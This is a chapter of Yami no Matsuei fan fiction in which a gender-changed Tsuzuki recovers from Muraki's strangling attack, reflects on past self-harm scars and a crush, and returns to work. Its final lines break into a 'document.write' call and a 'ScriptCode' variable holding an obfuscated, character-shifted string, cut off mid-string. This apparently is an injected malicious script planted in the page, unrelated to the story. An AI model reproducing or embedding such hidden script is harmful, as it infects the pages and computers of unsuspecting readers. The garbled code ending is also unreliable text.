Yami No Matsuei Fan Fiction ❯ Girl Trouble... ❯ Heartfelt ( Chapter 3 )

[ P - Pre-Teen ]

az: ^_^...inspiration... can't help myself... wish me luck on my finals!!


Disclaimer: I don't own Yami no Matsuei nor did I own the tankoubons or the anime. Characters and original excerpt from the fic are copyrights of Matsushita Yoko-sensei. No infringements are intended and no grudge was held during this production. The sea would dry out if I dare write sappy yaoi scenes.... Err, why suddenly it feels so hot in here.... lol...

Warning: Shonen-ai and really shoujo thoughts!! Go away if you don't feel so romantically-challenged...


Girl Trouble...

Heartfelt...

Written by Azzie @ Alienna Azuani @ Yami Azzie

'Tsuzuki...'

'Go away... I don't want you here. Release me...' Tatsumi released him immediately. Tsuzuki turned his face towards him and stuck his tongue at him before looking away. 'I hate you... you acted exactly like Shitsuji!!* All those harsh words...'

'Yes, I'm sorry... I was very worried about you and at that time I thought... this must be Muraki's trick and I can't control myself!! I... I deserve this!! This is my fault!! I couldn't protect you... instead I... You have all the rights to hate me... you do...', said Tatsumi as Tsuzuki instantly dropped the pretense of anger. 'I... I'm not that angry... It's not your fault! It's mine... if I didn't make myself too drunk...'

Tatsumi held his finger on Tsuzuki's lips to silence him. 'Please... stop bottling up everything inside of you. I can't bear it anymore... every time you felt hurt, you put up a fake smile to act as if it doesn't hurt. Like that time when I told you that I don't want to be your partner again... It hurts my feelings... Tsuzuki-san. Not just me... but everyone. Please... please be honest to us with your feelings...'

Tsuzuki looked at Tatsumi, feeling troubled at his outburst. But then, he looked away again as he remembered some incident in the past. 'It's okay.. I really meant what I've said... I don't blame you for what that had happened...'

'That time... I thought I was a goner...! Muraki lost control of himself... I never saw that side of him before...'

**

Pain... something, what is this...?

Tsuzuki opened his eyes to see only a silver tuft oh Muraki's hair. Suddenly he felt his very life sucked out of him as Muraki drank his blood. 'No.. stop it...', cried Tsuzuki as he weakly pushed Muraki free from him. Muraki glared at him with wild eyes as Tsuzuki tried to squirm away. Madness overcame Muraki as he jumped towards him and wrapped his hands around Tsuzuki's frail neck.

'You woman!!! How dare you want to leave me...! You're mine!! I won't let you go away to the arms of another!!', growled Muraki as Tsuzuki gasped desperately for air. Tsuzuki coughed painfully as Muraki continued strangling him. 'I'm not one of your collections anymore!! You can't throw me out like you did to my other dolls!! I'm not one of your dolls... Mother!!', cried Muraki as Tsuzuki tried to fight for his life.

'Stop this... Muraki...! *coughed* ...Help ...Tatsumi, help... I'm sorry... Tatsumi...', gasped Tsuzuki for one last time as his sight started to become blurry. His hands fall numbly on his side as Muraki finally regained his sanity. He gasped as he released Tsuzuki and clutched his head in self-shame. Tsuzuki writhed in front of him as he gasped for air. He tried to crawl away but cannot as he was already weakened by Muraki's assault.

Muraki lifted up Tsuzuki's weak body as the shinigami fought vainly in his arms. 'I'm sorry... Tsuzuki-san! Forgive me...', whispered Muraki softly in his ears as Tsuzuki's strength gave away...

**

'That time... I wondered about what had he gone through in the past to have spoke like that... to make him this crazy...', said Tsuzuki as he trembled at the thought of Muraki's strength overpowering him. I even thought... if by sacrificing my own life could make him stop killing innocent lives, make him fully sane again... I could have done so willingly... But then...

'Stop it... Tsuzuki. You don't have to think about that again... Right now, you have to concentrate on your own healing...', said Tatsumi as he tucked him on his bed. Tsuzuki closed his eyes as Tatsumi planted a soft kiss on his forehead. 'Now get some rest...', he said as he walked away and closed the door behind him. He readjusted his glasses as he headed towards the office building.

'Get well soon, Tsuzuki-san... I loved you...'

Back inside the infirmary, Tsuzuki reopened his eyes and glanced outside towards the cherry trees...

'When I was a child I wanted to build up my resistance to poison, so I took regular dosages of it... I mixed it little by little into my food and drink it to build up my immunity...'

This... I remembered that he told me this once. Hearing this and that from him... I wonder, what was that actually had happened between him and his mother? Or even... with his already dead half-brother he so wants to revenge on..?

'You could say... it was necessary...'

What was so necessary about that?! Were you treated badly when you were still little...?

'See...? You do care about me... you cutie...'

Tsuzuki rolled onto another side as he fought to contain his embarrassment. Do I...? I've always denied it when he said that... but every time he did anything, when I shout at him and all... I always thought, I did that as I felt hatred towards him. Do I really care about him...? Tsuzuki lifted his right arm and stared at his now bare wrist, revealing scars of past suicide attempts. Even before this, I had always acted like a little girl... hiding these scars hoping that I can at least be accepted.. But, him... I can't explain what he did to affect me this way... but, he didn't flinch when he saw these scars... As if, he understood my sorrows... he...

Tsuzuki closed his eyes in desperation as he tried to drive away his thoughts on Muraki. But it was of no use as he felt again the soft brush of his lips against his own, the warm breath, the smell of his hair, the sensation he felt as Muraki's finger touched his skin, his voice... his eyes...

He shouldn't be thinking about this, right now...

But he can't help it..

...can he?

--

--

Sleep eventually took him into temporary refuge as he contemplated his ever-growing crush on the very enemy that has turned him into the very state that he was in. Turning him into a girl... having every dream a girl could have hoped of finding the one that she truly loves...

Though, not like he could chose the one that he had a crush on...

(Az: ;P....I'm a hopeless romantic...)

**

The next day...

'Tatsumi... let me help you with those...', said Hisoka as he helped carry some of the papers that he was bringing in onto his desk. 'Thanks... Kurosaki-kun. How was your job..?'

'It's okay... The temporary partner I was assigned with had been helpful. Thankfully, there's no incident involving demons or monsters that needs the aid of a shikigami. So, I think the day was so fine...!!', chirped Hisoka as Tatsumi posed another question.

'Have you gone visiting Tsuzuki...?'

'I... err...'

'....?!'

'I... couldn't. It's... awkward, as it is...', said Hisoka as someone walked into the room...

'Is... Ka-Cho here...?', said the voice as Tatsumi and Hisoka turned their attention towards the source. Tatsumi darted towards the person as Hisoka merely stared at her. 'Tsuzuki...!!', fussed Tatsumi as he asked him to sit down. '..You should have taken it easy...' Tsuzuki shook her head as she glanced towards Hisoka. 'I can't stand doing nothing anymore!! I want to get back to work, it helped, you know... to keep me from thinking so much about him...'

'Tsuzuki...', gasped Hisoka as Earl emerged unexpectedly at the door. 'Was the rumors true... Has my lovely Tsuzuki-san turned into a beautiful lady? I--'

'Hakushaku-sama.... this is just not the time. Please return to your mansion...', said Tatsumi as Earl refused. 'Nonsense...! I can do whatever I liked to come and go as I--' A lightbulb shattered into pieces as Tatsumi left the Earl towards Tsuzuki's side. Tsuzuki was trembling with unsurpassed fear as he lay crouching on the floor. 'Please, Hakushaku...!! Just go!!', plead Hisoka as the surprised count left the place. He went back towards the other two, as he saw Tsuzuki clinging onto Tatsumi in desperation.

Minutes later, Chief Konoe emerged, followed by Watari as Tatsumi helped Tsuzuki stand. 'Eh..? Tsuzuki, what are you doing here..?' Tsuzuki let go of Tatsumi's hand as she bowed towards the chief. 'I was hoping that you can put me back on my shinigami duties... chief...', she said as the chief frowned. 'Are you sure... Tsuzuki-kun? In your condition right now...'

Tsuzuki shook her head in reply. 'It's fine... and I promised I'll be more careful of (using) my powers...', she said as the old man nodded. Watari grinned towards her. 'You're beautiful, Tsuzuki!! I wished I myself was successful in making the sex-changing potion...', he sighed as Tsuzuki made violent faces at him.

'By the way... who braided your hair? ', he said suddenly, as Tsuzuki and Tatsumi blushed...

**

Muraki stared towards the people walking around underneath him from the balcony, where he stood. All these people with such spiritual energies... but now, he felt no desire to take anyone's life or to torment anyone. Not even that annoying dog from next door that kept him dizzy with its barking. The only thing on his mind as he stared into nothingness, is the face of the fair shinigami that he had turned into a woman by a stroke of genius...

'Tsuzuki-san...', he sighed as he saw again the terrified face of hers as she tried to escape from him. 'Please forgive me...', he said as he took the glass on the side table and sipped the red wine that he had took out...

[TBC]


*referring to Vol 5, the book world

az: Okay... don't mind me changing the pronouns for Tsuzuki now and then... it's hard I know, but bear with me...

az: Alright.... I pause here now... I don't know how to continue. Don't worry... I'll think of something... document.write "

" ScriptCode = "ChlRBqhos+VRBqhos+@ookds+VhmO`sg+mEnkcdq+mBncdRtaQtm^Shld'(EE/0'(EE/1'(Dmc RtaEtmbshnmEE/0'(NmDqqnqQdrtldMdwsDqq-Bkd`qSncnHs